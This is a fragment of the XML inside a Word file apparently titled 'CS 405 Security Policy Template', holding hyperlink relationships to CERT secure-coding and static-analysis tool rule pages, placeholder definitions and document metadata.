Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/cplusplus/Klocwork" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Helix+QAC" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/ECLAIR" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PC-lint+Plus" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046388" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v1050/" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Klocwork" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/TrustInSoft+Analyzer" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Klocwork" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v670/" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v793/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/TrustInSoft+Analyzer" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Splint" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/RuleChecker" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcexp53cpp.html" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v781/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/ECLAIR" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v721/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcrulestr30c.html" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/cplusplus/Klocwork" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/cplusplus/Klocwork" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v562/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Klocwork" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Helix+QAC" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Helix+QAC" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/RuleChecker" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sonarsource.com/products/codeanalyzers/sonarcfamilyforcpp/rules-cpp.html" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/RuleChecker" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA"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display/c/LDRA" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/PVS-Studio" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v724/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PVS-Studio" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Klocwork" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/CodeSonar" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pvs-studio.com/en/docs/warnings/v546/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA" TargetMode="External"/><Relationship Id="rId15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2EE7020A-6035-4497-881E-A0A84036B242}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00C3341E" w:rsidRDefault="00C3341E">
          <w:r w:rsidRPr="5C472B96">
            <w:t>Click here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="33695E46DF0749BF8B81492F2F1B41FE"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{D5830383-A0AA-47E1-A916-3DF36D6B33C9}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00CE011D" w:rsidRDefault="00460DEA" w:rsidP="00460DEA">
          <w:pPr>
            <w:pStyle w:val="33695E46DF0749BF8B81492F2F1B41FE"/>
          </w:pPr>
          <w:r w:rsidRPr="5C472B96">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341E"/>
    <w:rsid w:val="00106DD2"/>
    <w:rsid w:val="002567E5"/>
    <w:rsid w:val="0029379C"/>
    <w:rsid w:val="002F2685"/>
    <w:rsid w:val="00460DEA"/>
    <w:rsid w:val="00562BC0"/>
    <w:rsid w:val="0059100D"/>
    <w:rsid w:val="007E2E76"/>
    <w:rsid w:val="00825219"/>
    <w:rsid w:val="0083271B"/>
    <w:rsid w:val="009618A0"/>
    <w:rsid w:val="009D2590"/>
    <w:rsid w:val="00A31398"/>
    <w:rsid w:val="00A47FE2"/>
    <w:rsid w:val="00B50B20"/>
    <w:rsid w:val="00C3341E"/>
    <w:rsid w:val="00CE011D"/>
    <w:rsid w:val="00D33A6D"/>
    <w:rsid w:val="00DD73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695E46DF0749BF8B81492F2F1B41FE">
    <w:name w:val="33695E46DF0749BF8B81492F2F1B41FE"/>
    <w:rsid w:val="00460DEA"/>
    <w:pPr>
      <w:spacing w:line="278"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38</Pages>
  <Words>9159</Words>
  <Characters>52207</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>435</Lines>
  <Paragraphs>122</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SNHU</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>61244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cp:lastModifiedBy>Engel, Brian</cp:lastModifiedBy>
  <cp:revision>245</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T19:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-19T14:58:00Z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TII_WORD_DOCUMENT_FILENAME">
    <vt:lpwstr>CS 405 Security Policy Template.docx</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="TII_WORD_DOCUMENT_ID">
    <vt:lpwstr>8c0f7766-333e-4fbb-b7c0-0c2611de1460</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="TII_WORD_DOCUMENT_HASH">
    <vt:lpwstr>947e92e0ec6a36c601b2562f11a51b7ddd99e85b340921ba1b636085105fed31</vt:lpwstr>
  </property>
</Properties>
</file>